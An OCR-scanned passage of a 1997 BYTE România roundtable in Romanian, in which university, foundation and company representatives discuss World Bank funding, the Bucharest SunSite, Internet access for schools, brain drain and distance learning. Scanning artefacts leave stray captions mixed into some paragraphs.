mare atenţie s-a acordat aces-
tui împrumut BM, care spe-
răm să fie folositor. Împru-
mutul este rambursabil, deci
sunt tot banii nostri. Tre-
buie spus ca sunt mentiona-
te nişte domenii prioritare,
unele sunt la sugestia BM,
altele sunt pe baza progra-
mului de reformă, însă nu au
fost neglijate nici domeniile
tradiționale, ca domeniile
economic, juridic, ştiinţe socio-umane şi,
desigur, domeniile interdisciplinare şi intro-
ducerea tehnologiilor noi în învățământ, pe
baza unor materiale multimedia şi altele.
Avem în vedere şi introducerea sistemului
de credite transferabile, transferabil însem-
nând mişcarea liberă a studenţilor între uni-
D-na Laura Lăzăroiu și d
versități, pentru a putea beneficia de cursuri
care se fac doar într-un anumit loc. Și atunci,
va trebui, evident, realizată o infrastructură
pentru a putea comunica eficient între uni-
versităţi. Dezvoltarea acestei infrastruc-
turi nu ține însă de CNFIS, decât într-o
măsură mai mică. De fapt, există un împru-
mut PHARE, care nu este rambursabil, de
8 mil. de ECU pentru crearea acestei infra-
structuri pentru învățământ. Se referă la
crearea unei rețele naţionale de comuni-
E
caţie, a bibliotecilor universitare şi la alte
aspecte ale colaborării universitare. Din
păcate, această componentă unu, din cauza
unor întârzieri la Bruxelles este rămasă în
urmă, probabil că se putea face mai mult. Ar
fi trebuit să demareze acum un an și să fie
sprijin pentru componentele doi și trei.
-na prof. lrina Athanasiu.
Componenta doi din finanţarea BM se
referă la învățământ, în principal invata-
mântul superior, iar componenta trei la
cercetarea în învățământul superior. În ceea
ce priveşte componenta doi, pentru care
CNFIS organizează competiţia, există trei
subcomponente: învățământ universitar,
învățământ la nivel de colegiu și programe
de educaţie permanentă. Toate aceste pro-
grame au alocate un fond de 27,6 mil.
dolari, pentru o perioadă de cinci ani. Și
finanţarea se realizează pe bază
de competiţie în patru runde de
competiție, prima rundă a fost
organizată în 15 ianuarie .
Darvas Attila: Deci, există
anumite fonduri. Cum au putut
afla cei interesaţi de existența
lor. Există documente publi-
cate sau un sit Web accesibil
public, de unde toţi cei intere-
saţi pot să afle detalii despre
participarea la proiecte ce pot
fi finanţate din aceste fonduri?
Silviu Cucerzan: Am publi-
cat, în septembrie, un buletin,
buletinul nr. 3 al consiliului |
finanţării şi consiliului cer-
cetării, trebuie să vă spun că,
din păcate, nu avem buget pro-
priu. Este paradoxal că CNFIS
nu are un buget propriu, am
publicat cu ajutorul unor bani
de la TEMPUS şi vom publica,
de asemenea, pentru runda a
doua a competiţiei, la sfârşitul
acestei luni, în buletinul nr. 4 în
care sunt date informaţiile
despre runda a doua.
Darvas Attila: În câte
exemplare au fost publicate
buletinele şi unde au ajuns ele?
Silviu Cucerzan: Aceste
buletine au fost publicate în
număr de 800 de exemplare, din câte ştiu
eu, şi le-am distribuit la rectorate.
Darvas Attila: Din păcate, acest mod de
informare este total ineficient, existând peri-
colul ca informaţiile să se rătăcească prin
mormane de hârtii sau sertarele unor per-
soane. Nu s-ar putea, totuşi, realiza un sit
IULIE 1997 BYTE Romania 69
Dosar
.
Învățământul și noile tehnologii
»
_
Pa E A
Web, cu informaţii accesibile pentru toți.
Acest lucru nu este așa de complicat pe cât
pare şi, la Tg.Mureş, unde predau şi eu,
există peste 60 de studenţi cu pagini proprii
şi accesibile de pe Web. Nu văd de ce n-ar
putea face şi o instituție câteva pagini?
Silviu Cucerzan: Nu a existat o pagină
Web acum. Avem în vedere să facem această
pagina Web, probabil si prin sprijinul dvs.,
pentru că vroiam s-o facem la Tg. Mureş.
Deocamdată, nu avem fondurile, însă,
putem cumpăra un server puternic pe care
să-l folosim pentru Web. Acum avem o legă-
tură doar prin modem. Cred că va exista
acest lucru, voi trimite dl-ui Dumitru
Rădoiu (lector univ. Tg. Mureş) toate mate-
rialele. Totuși, există o pagină Web în care
este prezentat CNFIS, dar nu cuprinde
foarte multe informaţii şi care este făcută
la Tg. Mureş.
Darvas Attila: Din păcate, această pagi-
nă nu există în acest moment. Ştiu pentru că
văd zilnic pagina universității. Chiar nu
există nici o posibilitate?
Silviu Cucerzan: Noi nu avem un cont
propriu pe Internet, este la Soros. Din
păcate, am primit o circulară prin care se
spune că trebuie să ne deconectăm și să ne
legăm în rețeaua Eunet. Eram pe cale să
otinem un cont Internet și am început să
creem acea pagină, totuși, informaţiile din
acest buletin vor apărea în mai multe pagini
Web, sila Politehnică la București.
Desigur, trebuie ţinut cont că, datorită
bugetului, ministerul își permite să angajeze
doar doi oameni care să lucreze pentru acest
consiliu. Oricum, documentele există în for-
mat Word sau RTF şi pot fi transmise pen-
tru a fi publicate.
70 BYTE România. IULIE 1997
D-na prof. lrina Athanasiu si dl. Silviu Cucerzan.
a $
Darvas Attila: Există și formularele
necesare pentru a participa la concursuri?
Silviu Cucerzan: Da, există și un sistem
de formulare şi înregistrarea se face pe baza
unui program surf. După care îl distribuim.
Deocamdată l-am distribuit, tot aşa, pe câte
o dischetă la fiecare rectorat, vă daţi seama,
cu greu am obţinut fondurile ca să cum-
părăm aceste dischete pentru 48 de rec-
torate.
Irina Athanasiu (U.P.B.): Înainte de a
ne mișca mai departe, ar fi bine să ştim şi noi
care au fost învățămintele relativ la prima
rundă. Pentru că unii au câştigat, iar alții au
pierdut. Am vrea să ştim cine a câştigat, de
ce a câștigat, pentru că, din punctul nostru
de vedere, lucrurile sunt neclare. Nu ştim
cât este politică în ceea ce s-a întâmplat şi
cât nu. Mai exact, ne-ar interesa ce a fost
prost în proiectele realizate, pentru că ceea
ce este caracteristic prost la aceste proiecte
româneşti caracterizează, probabil, şi alte
proiecte în cazul altor genuri de competiţii.
Silviu Cucerzan: Fiecare participant va
primi, în mod cert, fişele de evaluare de la
cei trei evaluatori din universităţi, pentru că
o primă evaluare este la nivel de experți
din universități şi, apoi, fişa de evaluare a
comisiilor de specialitate de la nivelul con-
siliului. Vom publica situația de ansamblu
şi ce s-a constatat. Vrem chiar să publicăm
modele de cereri, să se ştie cum trebuie com-
pletate aceste formulare.
Darvas Attila: Avem onoarea s-o salu-
tăm printre noi pe doamna Rodica Scafes,
Education Adviser la British Council. Pro-
gramele acestei instituţii pot ajuta integrarea
europeană a învățământului.
Rodica Scafeș (British Council): Să vă
spun ce facem noi. Din octombrie '95, în
cadrul bibliotecii engleze s-a înființat un ser-
viciu special care se numeşte „education
information service“, tocmai pentru că am
constatat că numărul celor care se intere-
sează de sistemul de învățământ britanic,
la orice nivel de studiu şi de sponsorizare a
crescut. De aceea, s-a înființat acest servi-
ciu. Serviciul s-a dezvoltat foarte mult, în
intervalul scurs din octombrie '95, şi am
ajuns să oferim chiar consultanță, pentru că
nu mai e vorba de simple răspunsuri la nişte
întrebări, ci oferim o asistență calificată. De
obicei, se încheie sesiunea și cu o prezentare
de CD-ROM. Cred că serviciul a început
să fie cunoscut și este extrem de solicitat.
Trecând de această fază de organizare în
care ne-am format, acum trecem în faza a
- doua a intenţiilor noastre și vom ieși în
.
teritoriu. Vom încerca să sensibilizăm pen-
tru forme de sprijin comunitățile locale pen-
tru că, în momentul de fata, in care noi nu
suntem încă membri ai comunităţii euro-
pene, suntem obligați să plătim o taxă inte-
grală. Aceste taxe sunt extraordinar de mari
şi, la potenţialul candidaţilor din România
nu și le pot permite efectiv. Pentru că aces-
te taxe nu sunt subvenţionate de nimeni, nici
de guvernul României, nici de guvernul bri-
tanic. Ele sunt, să zicem, între 6 mii, 7 mii
de lire sterline și trebuie să facem ceva pen-
tru că, efectiv, pierdem oameni foarte valo-
roşi. Fac o scurtă paranteză. A venit la
mine un elev din clasa a XII-a, care este
medaliat cu aur la Olimpiada Internaţion-
ală de Fizică, şi care, în mod firesc, ar vrea
să studieze în străinătate, în Marea Britanie.
Spre „ruşinea“ universităţilor britanice,
acestea au încercat să-l ajute, dar nici ele
măcar nu au reușit să găsească sponsorizare
pentru acest elev excepţional. În schimb,
l-au acceptat cinci dintre cele mai mari uni-
versități americane, cu bursă, Princeton,
Harvard, Stanford etc. Iar, de la Stanford
din California, l-a sunat personal laureatul
Premiului Nobel pentru fizică pe anul tre-
cutşi l-a sfătuit să vină la Stanford pentru că
acolo are toate condiţiile, au şi accelerator
de particule, iar acei 33 de mii de dolari, pe
care trebuie să-i plătească pentru întreaga
şcolarizare, îi poate obţine lucrând în cadrul
laboratoarelor de fizică ale universităţii
Stanford. Este foarte clar că pe acest copil
îl pierdem. Pentru a evita astfel de situaţii,
ne-am gândit să încercăm să obținem bani.
Dacă se găsesc bani pentru fotbal, pentru
vedete, pentru muzică pop şi tot felul de
concerte cu Sabrina de ce nu s-ar putea găsi
măcar a zecea parte din aceste sume şi care
să fie destinate training-ului? Şi prima acti-
une de acest gen o s-o avem la Sibiu când,
cu ajutorul rectoratului universităţii de aco-
lo şi a altor persoane, avem o întâlnire cu
*
Învățământul și noile tehnologii
Dosar
persoanele cheie ale comunităţii sibiene,
deci cu directori de bănci, directori de între-
prinderi, cadre didactice universitare şi mi
s-a spus că ar fi adunaţi toţi acei care ar pu-
tea, eventual, să acorde sprijin. Sigur că ră-
mâne ca selecția să o facă ei, pe plan local.
Sperăm să fie un succes deplin și, apoi, să
implementăm acest lucru și în alte centre
universitare, unde avem filiale, pentru că
acolo putem să „faxăm“, să timitem mate-
riale rapid.
Darvas Attila: Există deja, din fericire,
firme serioase, care au înţeles importanța
sprijinirii sistemului educaţional. ROMSYS
SA s-a remarcat, în acest, an prin dotarea
universităţii Politehnice Bucureşti cu un ser-
ver puternic, adecvat realizării unui SunSite.
Din păcate, după câte ştiu, acest lucru este
obstructionat si nu s-a găsit încă o încăpere
pentru SunSite România, în timp ce dotarea
cu echipamente de la Politehnică lasă încă
de dorit.
Laura Lăzăroiu (ROMSYS, Sun): Din
păcate, sunt cam amare lucrurile, aşa cum
spuneţi dvs. Dar, haideţi să discutăm puţin
mai pozitiv. Ca să ajungem deci la subiect,
ar trebui să vedem ce înseamnă SunSite.
Un SunSite înseamnă o zonă delimitată,
respectiv o instituţie universitară, care, prin
capacităţile în promovarea noilor tehnolo-
gii, câştigă statutul special de „Software
Information Technology Exchange“ de la
Sun. Aceste centre, trebuie să menţionez că
cele mai multe sunt în Europa dovadă că
bătrânul continent este fără dar și poate din
acest punct de vedere cel mai important, în
sensul că are interes foarte mare în pro-
movarea tehnologiilor de cel mai înalt niv-
el către tineri, deci acest Sun Site nu este un
titlu care se acordă, el se dobândeşte. Şi îmi
face plăcere să vă spun că Institutul
Politehnic București a dobândit acest titlu.
Este, până la urmă, dacă vreţi, o recunoaş-
tere a calităţii acestor oameni care sunt pro-
fesorii şi studenţii de acolo. Sun vrea să
creadă că dotarea este suficient de sub-
stanțială, să zicem noi, deci este vorba de un
server care este unic în România în momen-
tul de față ca dotare şi care va ajuta aceşti
profesori extraordinari, care sunt acolo, şi
pe studenții aceştia de a-şi pune în valoare
posibilităţile şi, de ce nu, să pună în valoare
ceea ce înseamnă România din toate
"punctele de vedere. Pentru că scopul Sun-
Site-ului este de a promova imaginea Ro-
mâniei în lume. Acesta este scopul fiecărui
SunSite: de a deveni un server de Web care
să pună la dispoziţia întregii comunități uni-
versitare și nu numai, informaţii despre țara
respectivă, despre preocupările specia-
liştilor de acolo. Aș vrea să anunţ că d-na
prof. Irina Athanasiu, a venit de curând de
la întâlnirea managerilor de Sun SITE din
Anglia şi ne poate spune câteva lucruri din
punctul de vedere al acestei comunităţi, a
comunităţii de SunSite. Aş vrea să mentio-
nez că acest pas, pe care l-am făcut prin insti-
tuirea SunSite-ului la Bucuresti, este nu
numai ca 6 recunoaştere a eforturilor pe
care aceşti oameni le fac, ci şi ca un mod de
a onora parteneriatul strategic cu România,
în eforturile de informatizare a societăţii
româneşti. Acești pași pe care Sun îi face,
poate sunt mărunți, dacă vreţi, dar sunt
totuşi nişte paşi făcuți şi noi vrem să credem
că reprezintă numai un început. Îmi face
plăcere s-o las în continuare pe d-na prof.
Athanasiu să ne spună câte ceva.
Irina Athanasiu: Înainte de a vă povesti
despre Sun SITE, aş vrea să vă spun ceva
despre relaţia dintre firme şi învățământ.
Şi aş vrea să dau două exemple, care mie mi
se par deosebit de semnificative. Această
universitară, ideea pe care o au studenţii,
în general este că Unix este soluţia, după
aceea ajung în viata și lucrurile sunt puţin
mai diferite. Primul răspuns, care mi s-a dat,
a fost că „pe noi nu ne interesează Româ-
nia“. Al doilea răspuns, care mi s-a dat în
momentul în care am protestat, spunându-
le că totuși, aveţi nevoie de absolvenţii noștri
ca să puteți să faceţi ceva in tara asta, a fost
„absolvenţii voştri, dacă vor să aibă o pâine,
n-au decât să înveţe singuri“ . Deci, încer-
carea pe care am făcut-o, de a avea o
prezentare Windows NT în facultate, nu s-a
realizat. Acestea sunt cele două limite. În
același timp, o firmă (din SUA) vine în
fiecare an, nu spun că racolează, ci
angazează pe cei mai buni absolvenţi. Mi
se pare mie aşa că ceva trebuie să se întâm-
ple şi pentru facultate. Şi nu-i vorba numai
de universitatea din Bucureşti, şi iau niște
Participanți la masa rotundă.
donaţie a lui Sun vine după ce noi am mai
primit o donaţie foarte importantă la Poli-
tehnică, un server de mari dimensiuni, ser-
ver cu care am putut să rezolvăm accesul
tuturor studenților din facultatea de auto-
matică şi calculatoare. Practic, toate orele
de specialitate se ţin pe serverul respectiv.
Şi această donaţie a venit în condiţiile în care
universitatea noastră nu a cumpărat nici
un fel de echipament. Şi vreau să fie foarte
clar că noi am căpătat această donaţie toc-
mai pentru că se înțelege importanța pe care
o are învățămâtul. De la o altă firmă, pen-
tru care nu vreau să dau numele, dar vreau
să precizez aici că nu este vorba despre
reprezentanța Microsoft în România, am
rugat pe cineva să vină să facă o prezentare
pentru studenţii facultăţii noastre referi-
toare la Windows NT, pentru că, se pare,
este un subiect foarte important. În lumea
copii pregătiţi şi antrenați de noi. Ar trebui
să se întâmple ceva și din partea lor. Prac-
tic, noi, la facultate, nu avem nici un fel de
reacție din partea firmelor. E bine, nue bine
ceea ce facem ? Este adevărat, foarte des mi
se cer recomandări de studenţi. Eu nu am să
recomand acum studenţi, pentru firme.
Probabil că facem ceva bine. Dar, ştiu eu cât
de bine facem ? N-a venit nimeni niciodată
la mine de la o firmă să-mi spună, „dom-
nilor, sunteți foarte slabi în x“. E ceva greşit
aici, în relația cu firmele. Am putea să fim în
nişte relaţii mult mai bune, mai legate şi să
se întâmple ceva. British Council mi-e foarte
drag, dar am două of-uri. Un ofeste: în Uni-
versitatea Politehnică București, şi nu nu-
mai, există un departament în care orele se
predau în limba engleză. Eu nu am simţit
nici un ajutor din partea lui British Council.
Este foarte ciudat, legăturile noastre impor-
IULIE 1997 BYTE Romania 71
*
Dosar | Învățământul și noile tehnologii
tante pentru filiera engleză, în care orele se
ţin în limba engleză, sunt în Olanda, în
Portugalia. Deci, nu ştiu, cred că greşim
undeva.
Darvas Attila: Cum se vede problema
învățământului văzut de la o firmă care
acordă consultanţă de nivel înalt în Româ-
nia?
Corneliu Fecioru (Coopers&Lybrand):
Problema cu care, practic, ne confruntăm
se referă, în primul rând la dezvoltarea unor
competenţe . Deci, din cadrul acestei dis-
cuţii ne interesează mai puţin starea
învățământului universitar şi mai mult acel
element care se referă la educaţia persona-
lului managerial. Şi, în sensul acesta, per-
sonal am salutat o serie de informaţii care
au apărut în revista BYTE România. Deci,
dintr-o perspectivă absolut practică, prob-
lema care ne-o punem este cum reușește sis-
temul de învățământ, care poate fi de nivel
universitar, care, așa cum am spus la început,
moşteneşte o abordare de tip secolul XIX,
sau programele adresate adulților, deci cum
pot aceste proiecte de programe să con-
struiască nişte competenţe care, în mod
tradițional, lipsesc managementului pro-
fesional din România. Şi acest tip de com-
petenţe, din nou, este părerea mea person-
ală, se referă nu la nişte aptitudini
funcționale, etice, ci sunt, în primul rând,
nişte aptitudini care se referă la conducerea
organizaţiilor, la felul în care organizaţiile
sunt conduse în mod eficient, angajaţii sunt
motivaţi iar directorii de întreprinderi, soci-
etăți, sunt nişte conducători autentici. Din
această perspectivă, personal mă îngrijore-
ază faptul că nivelul iniţiativelor, privind
învățământul alternativ şi învățământul de
tip la distanță, sunt la un nivel pe care, citind
publicaţiile de tip BYTE sau citind diverse
documente ale comunității europene, sun-
tem mult în urma țărilor din zona, să zicem,
fostului CAER. Alte țări, cum sunt Ungaria
şi Polonia, sunt, din păcate, înaintea noas-
tră ca şi număr de iniţiative, ca şi eficiența
acestor programe. Firma la care lucrez eu
nu cred că îşi pune problema, biroul este rel-
ativ mic, vorbim de circa 140 de angajaţi,
nu punem problema să se constituie într-o
prezenţă activă, semnificativă, în ceea ce
privește problema educaţiei, chiar și a
acestui segment pe care l-am invocat, deci
educaţia continuă și dezvoltarea profesion-
ală a unor competenţe de tip managerial.
Acesta este interesul persoanelor în cadrul
firmelor, în special a celor multinaționale
care operează în România. Și ceea ce, dacă
vreţi, dintr-o perspectivă occidentală,
lipseşte în România, nu sunt nişte compe-
tenţe de tip funcţional. Prin competență
funcțională înțeleg un absolvent de autom-
atizări care poate fi un foarte bun hardist sau
72 BYTE Romania JULIE 1997
un foarte bun softist, sunt nişte competențe
de alt tip, niște aptitudini de alt tip. E ade-
vărat că România are un palmares bogat în
medaliile obţinute la olimpiade inter-
naționale, însă noi suntem foarte puţin efi-
cienți când este vorba să lucrăm în echipă.
Întrebarea, care poate fi pusă, este: sistemul
nostru de învățământ încurajează lucrul în
echipă sau, dimpotrivă, exacerbează com-
petiția individuală? Care, sigur, are si
aspecte foarte bune, care sunt tocmai aces-
te medalii obținute la olimpiada inter-
națională, dar, pe de altă parte, aceste
deprinderi şi aceste atitudini, până la urmă,
sunt o parte din competențele de care vor-
beam si care se referă la lucrul în echipă. $i
care devin importante în momentul în care
unii dintre noi devin directori la firme
străine . Ceea ce mă îngrijorează este faptul
că puține persoane sunt interesate în comu-
nicarea între instituţiile care se ocupă de
educaţia tinerilor la nivel universitar sau la
nivel postuniversitar şi prin programe de
tip postgradual și firmele care, în mod prac-
tic, se ocupă cu dezvoltarea managerială,
pentru că eu nu ştiu să fi fost vreodată
abordati de vreo universitate sau altă insti-
tutie pentru a face cel puţin o prezentare a
activităţii noastre.
Darvas Attila: Domnul Marius Brago-
veanu, Open Learning Manager la CO-
DECS România are o experienţă într-un
domeniu educaţional modern, încă putin
răspândit.
Marius Braşoveanu (CODECS): Nu ştiu
dacă se face diferenţa între educaţie şi instru-
ire. CODECS nu pretinde şi nu cred că ar fi
în stare să facă educaţie, el face instruire.
Aşa, ca un scurt istoric, firma noastră a luat
naştere la sfârșitul anului 1993. Şi, de atunci
până acum, mai mult de 4000 de oameni nu
au fost instruiți cu ajutorul CODECS-ului
în management şi marketing. Cursurile
Open University din Marea Britanie sunt
partea unui program aparte, deşi ele pot fi
făcute individual, în sensul că poate fi făcut
un singur curs, obținând un certificat, şi cu
asta basta, totuşi, se pot urma gradual după
programa existentă. Ceea ce a adus CO-
DECS în metodologie este posibilitatea ca
adulții să studieze în paralel cu un serviciu.
lar conţinutul, aici putem discuta despre
conţinut, să zicem că sunt cursuri bune.
Există diferite genuri şi tipuri de cursuri. Ce
încercăm să facem în cadrul acestor cursuri
sociale, 4000 de oameni reprezintă totuși
o cifră, este să creăm acele atitudini şi apti-
tudini prin care oamenilor să le oferim un
vocabular, nişte cunoştinţe și o acreditare.
Ce aş mai putea să adaug ar fi că tehnologii-
le educaţionale, din câte am aflat, se referă
mai puţin la tehnologiile educaţiei și mai
mult la cum să proiectezi un sistem de edu-
caţie sau informaţie. Şi ar fi bine să folosim
ceea ce poate adăuga valoare, acolo unde
poate adăuga valoare. Am constatat că este
otendință ca oamenii să folosească tehnolo-
gia pentru că ea există. 80% dintr-un pro-
ces de educaţie de calitate se poate face
fără tehnologii deosebite.
Irina Athanasiu: Îmi pare foarte rău s-o
spun dar, vorbim de introducerea tehno-
logiilor moderne, vorbim despre multime-
dia şi noi nu avem posibilitatea multiplicării
unor foi banale ca să le dăm studenților, ca
să eliminăm acea spaimă că trebuie să noteze. -
tot ce spunem la cursuri și, dacă o vreme mai
putem rămâne cu această tehnologie de
predare, mi se pare mult mai grav faptul că
aceste aspecte negative au un impact mult
mai mare în cazul studenţilor de la alte spe-
cialităţi, nu de la calculatoare, care vor
supravieţui, dar ceilalți studenți, în curând
vor părea că sunt analfabeți, oriunde se vor
duce în lume. Pentru că nu mai este suficient,
în momentul acesta, să ştii o limbă străină.
În momentul acesta trebuie să stăpâneşti o
tehnică multimedia, trebuie să fii în stare
să faci o prezentare, cu slide-uri, cu un Po-
werPoint sau un alt mecanism, trebuie să
fii în stare să utilizezi Internetul şi să-ți poți
prezenta o pagină Web, trebuie să fii în stare
să cauţi ceva pe Internet şi aşa mai departe.
Şi, dacă cei din specialitatea calculatoare vor
supravieţui, pentru că se ocupă de asta, ceea
ce se întâmplă în alte discipline este ceva
foarte grav și vom plăti cu toţii. Vreau să
spun aici ceva, ce poate că trebuia să spun
de la început. Este foarte bine că suntem aju-
taţi de BM, este foarte bine că avem sprijinul
unor firme. Multe dintre lucrurile care s-au
întâmplat în învățământul superior, de fapt
de ce să n-o spunem sincer, ceea ce s-a întâm-
plat în învățământul superior ca dotare în
tehnică de calcul se datorează, practic,
numai proiectelor TEMPUS. Ceea ce se
întâmplă în liceele noastre se datorează
numai fundaţiei Soros. Dacă nu se va pro-
duce o schimbare, la nivel de înțelegere
național, tot ceea ce încercăm noi să facem
sunt linguriţe dintr-un ceai într-o mare.
Adică, s-a făcut o dotare iniţială în învăță-
mântul superior, care era destinată să fie o
dotare inițială, dar era destinată numai
primilor ani universitari. Şi s-au cumpărat,
nu mai discut acuma dacă asta a fost cea mai
bună soluţie sau nu, s-au cumpărat acele
reţele Novell de care ştie toată lumea. Cum
să spun, este foarte bine că ne preocupăm
ca un copil excepţional să-şi poată face
studiile în străinătate. Dar ce facem cu cei
care stau acasă? Ce le oferim? Ce oferim noi
absolvenţilor? Adică, una dintre problemele
pe care o are facultatea mea, şi sunt convinsă
că același lucru se întâmplă în toate fac-
ultăţile țării: noi nu avem clasă de mijloc.
Învățământul și noile tehnologii
Dosar
Există un corp profesoral, nu pot să spun
în vârstă pentru că fac parte din el, pe lângă
care trec în fiecare an nişte asistenți. ȘI trec
pentru că ei sunt în drum spre doctorate în
Anglia, un caz bun din punctul nostru de
vedere pentru că din Europa s-ar putea să se
întoarcă, dar majoritatea sunt în drum spre
doctorat în Statele Unite, alţii sunt în drum
spre un job plătit bine, eventual la Microsoft
şi nu rămâne nimeni aici. Desigur, fiecare
are viaţa lui şi trebuie să meargă la nivelul
maxim la care poate să atingă ceva. Dar, ce
se întâmplă aici? Adică, așa cum pentru o
societate, societatea românească, faptul că
nu există o clasă de mijloc face să se întâm-
ple ceea ce se întâmplă, acelaşi lucru se
întâmplă și în învățământ. Noi nu avem nici
O șansă să-i ținem pe copii aici. Orice asis-
tent al meu face, în același timp, două norme
la şcoală şi mai lucrează la o firmă şi o muncă
de cercetare ştiinţifică, de doctorat. Nu se
poate așa ceva. Cum să spun, lucrurile tre-
buie schimbate. E foarte bine că ne ajută atâ-
ta lume, dar nu trebuie să rămânem în situ-
atia de asistați. Mie îmi pare foarte rău că
n-a venit nimeni de la Ministerul
Învățământului. Adică, s-ar putea face o
iniţiativă legislativă de genul că, cineva care
sponsnrizează o şcoală, să i se tragă acea
sumă din profit.
Nicolai Sandu (Fundaţia Soros Româ-
nia): Din păcate, așa cum a spus d-na prof.
Irina Athanasiu, se întâmplă ca la momente
pe care mi le amintesc de la Grupul de Dia-
log Social sau de la Convenţia Democrati-
că, momente în care toţi erau de acord cu ce
trebuie făcut, dar, nu s-a realizat nimic,
datorită faptului că cei cu care trebuie să
comunicăm și să dezbatem aceste probleme
nici nu vin la aceste întâlniri. La întrebarea
simplă dar foarte acută, dacă România este
pregătită pentru global information society
şi dacă acest guvern sau altul are soluţii pen-
tru această problemă? Răspunsul îl ştiţi bine,
iar răspunsul meu este, fără ezitare, nu. Şi
că, dacă în alte domenii mai putem să pier-
dem un tren, aici nu există decât unul sin-
gur şi, o dată pierdut, mă îndoiesc că îl vom
mai prinde. Ce a făcut Fundaţia Soros în
domeniul preuniversitar a însemnat peste
2000 de computere donate în ţară. Din
păcate, acest program a fost oprit, în speran-
ţa că s-a demonstrat că se poate face. A fost
un proiect pilot şi s-a considerat că s-a inte-
les mesajul și sunt sigur că autorităţile vor
avea un plan de continuare a acestui tip de
program cu părţile lui bune şi rele. S-a con-
statat însă că, după doi ani, nu s-a întâmplat
nimic. Există tot felul de proiecte guverna-
mentale care în principiu ar trebui să ofere
instrumentele de lucru pentru o societate
de tip informaţional celor 4.5 milioane de
elevi. Pentru că, ceea ce a făcut Fundaţia
Soros şi alte iniţiative private a avut părți
foarte bune şi în universități. S-a simţit
acolo unde au venit elevi de la aceste licee,
dar a creat o inechitate socială pentru că
şcolile care nu au fost sprijinite nu au nici o
vină. Acea inechitate socială se va accentua
în continuare şi este evident că nici un absol-
vent de liceu nu va găsi de lucru, dacă nu a
avut acces la un computer. Eu consider că
este dreptul acestor tineri să aibă acces la un
computer. Fundaţia, în momentul de față,
are o înțelegere semnată cu Ministerul
Învăţământului, prin care cele două reţele
RoEdunet şi Soros colaborează pentru a
Ob
D-na Rodica Scafes de la British Council.
oferi acces la Internet cu Fundaţia Soros
pentru învățământul preuniversitar, până
în momentul în care Ministerul va reuşi să
preia întreaga infrastructură creată de Fun-
daţia Soros şi să poată oferi în continuare şi
pentru celelalte școli. Orice instituție care
aparţine MI, in general, cand solicită acce-
sul la Internet la Fundatia Soros, trebuie sa
aibă un acord, aviz, de la Comisia de Coor-
donare pentru Învățământ, din care fac şi
eu parte. Mai ales că, în sistemul universi-
tar, avem deja dotate câteva facultăți si se
încearcă trecerea la RoEdunet dar sunt
probleme tehnice. Cred că rețeaua noastră
a suplinit ceea ce nu a putut face rețeaua edu-
caţionalăa Ministerului Învăţământului. S-a
anunțat un program în presă prin care
şcolile care doresc să se conecteze la Inter-
net pot apela la cele patru centre ale Fun-
datiei Soros din Bucuresti, laşi, Cluj sau
Timişoara, pot primi un modem, pot primi
cont de e-mail, iar pentru şcolile care reuşesc
să facă o pagină de prezentare, care este găz-
duită de serverele fundaţiei şi demonstrează
că au audienţă, pot primi chiar o linie
închiriată sau dial-up ppp acces la Internet.
Dar sitemul educaţional nu este pregătit,
oamenii nu știu despre ce este vorba, iar cei
care ştiu câte ceva s-au speriat. S-a făcut
mare vâlvă, la nivel guvernamental, cu
secretele de stat furate pe Internet, şamd.
Si nu e bine acest lucru. Şcolile ar trebui să
aibă mai multă personalitate, să poată spune
că, pe lângă programa şcolară, oferă şi cur-
suri de Internet şi, astfel, vor atrage mai
mulţi elevi. În continuare Fundaţia Soros
este deschisă pentru noi programe, noi
proiecte, aşteaptă proiecte care să vină din
afara fundaţiei, atât în domeniul ofertei de
burse cât şi în alte domenii. Repet, nu există
programe de dotare, aceste programe, în
momentul de faţă, au fost în mare parte
oprite.
Tudor Macovei (ORACLE România):
Nu suntem singura țară în care foarte mulți
tineri îşi doresc un calculator. La ultimul
eveniment, să zicem de importanță euro-
peană, din Austria, preşedintele firmei a
spus că statisticile relevă că 5% din popu-
laţia lumii are acces, foloseşte un calcula-
tor.În ceea ce priveşte PC-ul, asta-i o chestie
românească, şi dacă într-un mediu eterogen
ca Spania, Turcia, PC-ul are o pondere de
40-50% din tehnica de calcul, în România
acest procent este de 80-90%. O problemă
globală o constituie faptul că în, Europa de
IULIE 1997 BYTE România 73
Dosar
Invățământul și noile tehnologii
vest, doar 15% ştiu să utilizeze un calcula-
tor. Din cauza asta, în momentul de faţă
integrările sunt mult mai greu de atins. Şi
poate cel mai important în iniţiativa ORA-
CLE, care lucrează împreună cu alte firme,
este ideea unui calculator fără resurse prea
puternice, network computer. E vorba de
un terminal semiinteligent, cu foarte puţine
resurse, și care accesează un server. Toate
resursele, soft-ul etc. sunt undeva în rețea,
ce pot fi accesate prin intermediul unei
parole. Oricum, Microsoft a fost prima fir-
mă care a protestat.
Darvas Attila: Există proiecte concrete
pentru învățământ, la Oracle România?
Tudor Macovei: Există o politică globa-
lă care este oarecum deficitară. Pentru că nu
peste tot există aceleaşi surse de venituri. Pe
scurt, inițiativa universitară în România
constă în achiziționarea unui număr de pro-
duse ORACLE, cu un număr fix de utiliza-
tori, care va fi folosit în interiorul univer-
sitatii, la preţul de un utilizator/produs.
Există un program de instruire pentru fie-
care produs achiziţionat, se oferă pentru
două persoane un set complet de cursuri,
la un preţ echivalent poate cu 20% din
preţul standard, prezentate într-un mod aca-
demic, nu comercial. Dar, la mai multe uni-
versitati din tara, din câte ştiu, rezultatele
au fost sub asteptarile noastre, din cauza lip-
sei fondurilor.
În privinţa tehnologiei de instruire :
până în anul 2000 saltul va fi de 40% față
de volumul curent. În schimb, în ceea ce
priveşte tehnologia de autoinstruire, saltul
va fi de peste 400%. Deci, lucrurile se schim-
bă. Există cîteva probleme: clientul nu are
suficienți bani şi nu are timp să-şi timită
oamenii la cursuri. Şi atunci, are nevoie de
o metodă de instruire la îndemâna lui, care
să fie făcută după ritmul propriu al cursan-
tului, mai încet, mai repede, ziua, noaptea
şi care să fie accesibil. Probabil că această
metodă nu oferă aceeaşi informaţie ca
predarea la sală, dar este o alternativă.
Cursurile sunt standard, aceleași ca în Brazi-
lia, America. Am citit ce spunea o persoană
importantă, în 30 de ani campusurile vor fi
o amintire. Instruirea prin alte metode,
decât cele standard, va produce mutații. $i
este mai ieftină.
Darvas Attila: S-ar putea să fie mai iefti-
nă, dar este mai ineficientă. Toate cursu-
rile astea, în general, sunt însoţite și de
consultaţii oferite de profesori. Profesorul
are cursuri pe Web, dar are şi ore prin care
verifică şi orientează activitatea.
Irina Athanasiu: Aici și eu vă contrazic.
Nu vorbim de pregătirea clienţilor. Una este
pregătirea unui om gata format. Dacă vor-
bim despre pregătirea studenţilor, este
foarte important ca studentul să-l vadă pe
